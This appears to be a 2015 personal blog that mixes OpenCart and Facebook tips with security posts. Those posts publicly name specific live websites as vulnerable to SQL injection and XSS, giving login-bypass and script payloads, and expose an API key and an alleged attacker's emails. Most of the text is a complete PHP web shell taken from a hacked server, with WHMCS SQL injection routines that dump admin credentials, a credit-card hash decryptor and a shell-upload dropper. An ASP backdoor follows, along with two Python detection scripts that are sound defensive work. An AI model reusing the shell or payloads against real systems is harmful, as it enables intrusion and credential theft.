Saturday, 29 August 2015

Mass move your categories to another store (id) in OpenCart

This simple SQL query adds all your categories to another store quickly and easily:

INSERT into `oc_category_to_store` (category_id, store_id) SELECT category_id, 0 from oc_category;

Replace the 0 (zero) with the id of the other store.

Thursday, 27 August 2015

Problem with facebook business page that cannot be shown on mobile - cannot search facebook page via smartphone


A Facebook business page cannot be found in Facebook mobile search from any kind of mobile device.


You can try to:

- contact Facebook's customer care ... which doesn't reply very often.

- unpublish (hide) and republish your Facebook page. This method works for pages that cannot be reached at all (desktop and mobile).

- merge any duplicate Facebook business pages. The problem may be that only one of them shows up in searches.

- make sure to configure/assign the definitive Facebook web address in the page settings.


These are NOT definitive solutions!



Facebook business page problem: page missing on mobile - cannot search for it from a phone


A Facebook business page is not found in mobile searches and cannot be opened from any phone.


You can try to:

- contact Facebook support ... which does not reply often.

- hide and republish the page. This method works (worked) for pages that are not visible on desktop and mobile.

- merge any duplicate business pages. One is visible and the other is not.

- make sure you have set the Facebook address for the page.


These are not guaranteed solutions, but they are the hypotheses I could come up with when this problem arose!

Wednesday, 26 August 2015

http://www.instat.gov.al | possible SQL injection, data leak, data dump

http://www.instat.gov.al/al/figures/statistical-databases/select.aspx?rxid=1df185c6-c85e-4c8d-b7ae-d400ecedf852&px_tableid=LSMS51

LSMS51 seems to be the table name, and we can inject SQL/data queries.

http://www.akp.gov.al/ | Joomla 1.7 with bugs

www.qkr.gov.al | XSS

sample:
www.qkr.gov.al/nrc/SearchPage.aspx?find=search:"><script>alert(1);</script><"&t=3

Thursday, 20 August 2015

http://www.domaindirect.it/ | SQL injection, data dump, XSS

http://www.domaindirect.it/cat/tre%20lettere/page=XXX

SQL injection is possible in several parts of the website.

The PHP website is using Zend.


XSS
www.domaindirect.it/search/"><script>alert(1);</script>

http://www.martialart.it | sys compromise, path disclosure, etc

path: /web/htdocs/www.martialart.it/home/firedragon/

 api flickr 5975c197350037e77999ef112ec76cbe

Sunday, 16 August 2015

https://www.msweb2000.ca/ | SQL injection at login

admin
a' or 1=1 --'

Wednesday, 12 August 2015

newshell.it | SQL injections, system compromise, plesk remote exploit

https://newshell.it/index.php?action=utente&utenteAction=login

SQL injection in the login area

__________________________

https://mac.newshell.it:8443


https://xen1001.newshell.it:8443/
https://www.registrazionedomini.in:8443/
plesk + apache - remote exploit problem

Saturday, 8 August 2015

Best SEO practice to redirect a domain to your own

Use a PHP page (index.php) that sends a 301 Moved Permanently:

<?php
// 301 Moved Permanently
header("Location: http://www.bnit.it", true, 301);
// Stop here so nothing else is sent after the redirect header
exit;
?>

Friday, 7 August 2015

php shell found on a hacked server

andriroot@gmail.com is the email address of the attacker. He is known as andri Cyber4rt and is from Jakarta.
He usually uses the same email for fraud and usually abuses old bugs in WHMCS, Plesk and so on.
His alternative email address is andri.cyber4rt@gmail.com.


 if(strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
header('HTTP/1.0 404 Not Found');
exit;
}
function printLogin(){
echo "<html><head><title>./DM ExploiterZ [ 0day ]</title>
<style>body {font-family: 'Audiowide',serif;font-size: 20px;} </style></head>
<body bgcolor=black><center><br><br>
<nobr><font face=Audiowide color=blue>ExploiterZ <font color=white>[ 0day ]</font></nobr><br><br>
<form method=post>
<img src='https://fbcdn-photos-c-a.akamaihd.net/hphotos-ak-ash3/t1/994064_479867415465112_1199170647_n.jpg'><br><br>
:: Password :: <br><br>
<input size=30 style='color:blue;background-color:#000000' type='password' name='pass'>
<input style='color:blue;background-color:#000000' type=submit value=' Login Cuk '></font></form><br><br>";
exit;
}
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])] )) {
if(empty($auth_pass) || (isset( $_POST['pass']) && (md5($_POST['pass']) == $auth_pass))) {
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
} else {
printLogin();
}
}
set_time_limit(0);
error_reporting(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = 'andriroot@gmail.com'; # ganti dengan email kamu

$error[] = 'You have an error in your SQL';
$error[] = 'supplied argument is not a valid MySQL result resource in';
$error[] = 'Division by zero in';
$error[] = 'Call to a member function';
$error[] = 'Microsoft JET Database';
$error[] = 'ODBC Microsoft Access Driver';
$error[] = 'Microsoft OLE DB Provider for SQL Server';
$error[] = 'Unclosed quotation mark';
$error[] = 'Microsoft OLE DB Provider for Oracle';
$error[] = 'Incorrect syntax near';
$error[] = 'SQL query failed';

function cut($start,$end,$top){
$c =strlen($start);
$desc= strstr("$top","$start");
$count = strpos("$desc","$end");
$desc = substr($desc,$c,$count-$c);
return $desc;
}

function tengah($string, $awal, $akhir){
$string = " ".$string;
$strings = strpos($string,$awal);
if ($strings == 0) return "";
$strings += strlen($awal);
$antara = strpos($string,$akhir,$strings) - $strings;
return substr($string,$strings,$antara);
}

function konek($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
if($data) {
return $data;
} else {
return 0;
}
}

function filter($string){
if(get_magic_quotes_gpc() != 0){
return stripslashes($string);
} else {
return $string;
}
}


function letItBy(){
ob_flush();
flush();
}

function getAlexa($url){
$xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
$rank1 = $xml->SD[1];
if($rank1)
$rank = $rank1->POPULARITY->attributes()->TEXT;
else
$rank = 0;
return $rank;
}


function google($query, $page=1){
$resultPerPage=8;
$start = $page*$resultPerPage;
$url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=en&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
$resultFromGoogle = json_decode( http_get($url, true) ,true);
if(isset($resultFromGoogle['responseStatus'])) {
if($resultFromGoogle['responseStatus'] != '200') return false;
if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
else return $resultFromGoogle['responseData']['results'];
}
else
die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
}

function http_get($url, $safemode = false){
if($safemode === true) sleep(1);
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close();
}

function hajar($url) {
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}
else
return "Fail!";
}
else
return "Fail!";
}

function hack1($url) {
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,roleid,0x3a,username,0x3a,email,0x3a3a3a3a3a) FROM tbladmins ORDER BY id ASC),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}
else
return "Fail!";
}
else
return "Fail!";
}

function hack2($url) {
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,password,0x3a3a3a3a3a) FROM tbladmins ORDER BY id ASC),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}
else
return "Fail!";
}
else
return "Fail!";
}


function dm($url,$injection){
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,($injection),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?)::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}else{
return "Fail!";
}
}else{
return "Fail!";
}
}

function get_base_dir($URL) {
$URL = str_replace("http://","",$URL);
$URL = str_replace("https://","",$URL);
$parts = explode('/',$URL);
$newURL = "http://";
for ($i = 0; $i < count($parts); $i++) {
if(strpos($parts[$i],'.php') == false)
$newURL .= $parts[$i] . "/";
}
return $newURL;
}
 
function vb_vuln($URL) {
$URL = str_replace("http://","",$URL);
$URL = str_replace("https://","",$URL);
$URL = str_replace(".php","",$URL);
$xURL = explode("/",$URL);
$count = 0;
foreach ($xURL as $dir) {
if($count != 0)
$URL = $URL . $dir . "/";
else $URL = $dir;
$source = "";
$arr = parse_url('http://' . $URL);
if(strpos($URL, '?')) return 'EOF';
if(substr($URL, -1, 1) != '/') $URL = $URL . '/';
if(!$arr['scheme']) $URL = 'http://' . $URL;
$headers = get_headers('http://' . str_replace("//","/",$URL . '/install/upgrade.php'));
if(substr($headers[0], 9, 3) == '200') {
$source = file_get_contents('http://' . str_replace("//","/",$URL . '/install/upgrade.php'));
GLOBAL $victimURL;
$victimURL = $URL . "/install/upgrade.php";
if(strpos($source,'Begin Upgrade') != false)
return "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
}
elseif($headers = get_headers('http://' . str_replace("//","/",$URL . '/core/install/upgrade.php'))) {
if((substr($headers[0], 9, 3) == '200' || substr($headers[0], 9, 3) == '302') && substr($headers[7], 9, 3) != '404') {
$source = file_get_contents('http://' . str_replace("//","/",$URL . '/core/install/upgrade.php'));
GLOBAL $victimURL;
$victimURL = $URL . "/core/install/upgrade.php";
if(strpos($source,'Begin Upgrade') != false)
return "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
}
}
$hash ="";
preg_match_all('|var CUSTNUMBER = "(.*?)";|', $source, $res);
foreach ($res[1] as $hash) {
if(strlen($hash) == 32)
return $hash;
}
preg_match_all('|var CUSTNUMBER="(.*?)";|', $source, $res);
foreach ($res[1] as $hash) {
if(strlen($hash) == 32)
return $hash;
}
$count++;
}
}

function check_injection($url){
$data = http_get( str_replace("=", "='", $url) );
$errors = implode("|", $GLOBALS['error']);
return preg_match("#{$errors}#i", $data);
}

function req($url,$fields){
$opts = array(
CURLOPT_HEADER =>1,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_URL => 'http://www.sms-online.web.id/'.$url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $fields,
);
$ch=curl_init();
curl_setopt_array($ch,$opts);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}

function fc_vuln($url) {
$shell = dirname($url) . '/temp/ganteng.php';
$url = dirname($url) . '/upload.php';
$postFields = array();
$filePath = "/home/cpdebx/public_html/fc/ganteng.php";
$postFields['file'] = "@$filePath";
$curl_handle = curl_init();
curl_setopt($curl_handle, CURLOPT_URL, $url);
curl_setopt($curl_handle, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_handle, CURLOPT_POST, true);
curl_setopt($curl_handle, CURLOPT_POSTFIELDS, $postFields);
$result = curl_exec($curl_handle);
curl_close($curl_handle);
if(strpos($result,"@ganteng.php") != false)
return $shell;
else
return "Fail!";
}

function inject($url,$anu){
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,($anu),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?)::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}else{
return "Fail!";
}
}else{
return "Fail!";
}
}

function dec($string,$cc_encryption_hash){
$key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
$hash_key = _hash($key);
$hash_length = strlen($hash_key);
$string = base64_decode($string);
$tmp_iv = substr($string,0,$hash_length);
$string = substr($string,$hash_length,strlen ($string) - $hash_length);
$iv = $out = '';
$c = 0;
while ($c < $hash_length){
$iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
++$c;
}
$key = $iv;
$c = 0;
while ($c < strlen($string)){
if(($c != 0 AND $c % $hash_length == 0)){
$key = _hash($key . substr($out,$c - $hash_length,$hash_length));
}
$out .= chr(ord($key[$c % $hash_length]) ^ ord ($string[$c]));
++$c;
}
return $out;
}
function _hash($string){
$hash = (function_exists('sha1')) ? sha1($string):md5($string);
$out = '';
$c = 0;
while ($c < strlen($hash)){
$out .= chr(hexdec($hash[$c] .$hash[$c + 1]));
$c += 2;
}
return $out;
}
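
Every injection function in the sample above (hajar, hack1, hack2, dm, inject) posts the same body shape to viewticket.php: `tid` sent as an array with `sqltype` and `value` keys. The following request-body check is an added example, not part of the original post or of the recovered shell; `SCALAR_PARAMS`, `inspect_body` and the sample bodies are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

# Parameters the application expects as single scalar values. "tid" is the
# one the sample targets; extend the set per application (assumption).
SCALAR_PARAMS = {"tid"}
BRACKET_KEY = re.compile(r"^([^\[\]]+)\[[^\]]*\]")
SQL_HINT = re.compile(r"\bunion\s+(?:all\s+)?select\b|\bgroup_concat\s*\(", re.I)


def inspect_body(body):
    """Return (reason, key) findings for one form-encoded POST body."""
    findings = []
    # parse_qsl percent-decodes keys, so tid%5Bsqltype%5D is seen as tid[sqltype].
    for key, value in parse_qsl(body, keep_blank_values=True):
        match = BRACKET_KEY.match(key)
        base = match.group(1) if match else key
        if base not in SCALAR_PARAMS:
            continue
        if match:
            findings.append(("array_for_scalar", key))
        if SQL_HINT.search(value):
            findings.append(("sql_keywords", key))
    return findings


# Constructed request bodies, not captured traffic.
SAMPLES = {
    "normal": "tid=483920&c=kz9x",
    "array": "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0",
    "encoded": "tid%5Bsqltype%5D=TABLEJOIN&tid%5Bvalue%5D=-1",
    "other_param": "tags[]=a&tags[]=b&tid=12",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, inspect_body(body))
```

The `array_for_scalar` finding fires even when the value carries no SQL keywords, which catches the percent-encoded bracket form that a plain string match on `tid[sqltype]` would miss.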

useless asp stuff found on a hacked server

<%
if request.QueryString("1")<>2 then
response.Write "<iframe src=""http://127.0.0.1"" width=100% height=100% frameborder=0></iframe>"
response.End()
end if
%>
<%
if request.Form("c")<>"" then
randomize
shuliang=Int((10000000 - 1 + 10000000) * Rnd + 1)
title=Replace(request.Form("title")," ","-")
path1=replace(server.mappath("1.asp"),"1.asp","")
path=path1&title&"-"&shuliang&".html"
dbfile=path1&"1.htm"
response.Write path&"<br>"
response.Write dbfile&"<br>"
str1=Replace(request.Form("c"),"<br><","<")&"</body></html>"
str2="<a href="&title&"-"&shuliang&".html"">"&request.Form("title")&"</a>"
response.Write str1&"<br>"
response.Write str2&"<br>"
set myfso = Server.CreateObject("Scripting.FileSystemObject")
set myfile1 = myfso.CreateTextFile(path,true)
set myfile2 = myfso.CreateTextFile(dbfile,true)
        myfile1.WriteLine(str1)
        myfile1.close
            myfile2.WriteLine(str2)
        myfile2.close
        set myfso = nothing

response.Write "<font color=red>Good Luck!</font>"
end if
%>
<title>MS</title>
SD
<form action="" method="post">
  <input type="text" size=48 name="title" value='' />
  <input type="submit" id="b" value="J8"><br>
<textarea name="c" cols=60 rows=9></textarea>
</form>
<p></p>
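
Both recovered files (the PHP shell and the ASP page above) contain distinctive strings that can be searched for on other hosts. The scanner below is an added example, not code from the original posts; the indicator names, the suffix list, the two-hit threshold and the demo file names are assumptions, and the demo files are constructed fragments rather than the full samples.

```python
import re
import tempfile
from pathlib import Path

# Patterns copied from the two samples on this page. The indicator names and
# the two-hit threshold are choices made for this example.
INDICATORS = {
    "ua_cloak": re.compile(r"strpos\(\s*\$_SERVER\['HTTP_USER_AGENT'\]\s*,\s*'Google'\s*\)"),
    "host_md5_session": re.compile(r"\$_SESSION\[\s*md5\(\s*\$_SERVER\['HTTP_HOST'\]"),
    "md5_pass_gate": re.compile(r"md5\(\s*\$_POST\['pass'\]\s*\)\s*==\s*\$auth_pass"),
    "tid_tablejoin": re.compile(r"tid\[sqltype\]=TABLEJOIN"),
    "asp_fso_write": re.compile(r"Scripting\.FileSystemObject[\s\S]{0,400}CreateTextFile", re.I),
    "asp_form_input": re.compile(r'request\.Form\(\s*"c"\s*\)', re.I),
}
SCRIPT_SUFFIXES = {".php", ".phtml", ".inc", ".asp", ".aspx"}


def scan_text(text):
    """Return the sorted names of the indicators found in one file's text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan_tree(root, min_hits=2):
    """Map relative path -> indicators for script files with >= min_hits matches."""
    findings = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCRIPT_SUFFIXES:
            continue
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if len(hits) >= min_hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


def demo():
    """Scan a constructed web root holding short fragments of both samples."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text("<?php header('Location: /shop/'); exit;\n")
        (root / "img").mkdir()
        (root / "img" / "cache.php").write_text(
            "if(strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {}\n"
            "if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])] )) {}\n"
            '$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1";\n')
        (root / "up.asp").write_text(
            '<% if request.Form("c")<>"" then\n'
            'set myfso = Server.CreateObject("Scripting.FileSystemObject")\n'
            "set myfile1 = myfso.CreateTextFile(path,true)\nend if %>\n")
        return scan_tree(root)


if __name__ == "__main__":
    for rel, hits in sorted(demo().items()):
        print(rel, hits)
```

Requiring two distinct indicators per file keeps a single common call, such as a lone `CreateTextFile`, from flagging legitimate code; a renamed or obfuscated copy will not match and needs other checks such as file integrity monitoring.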
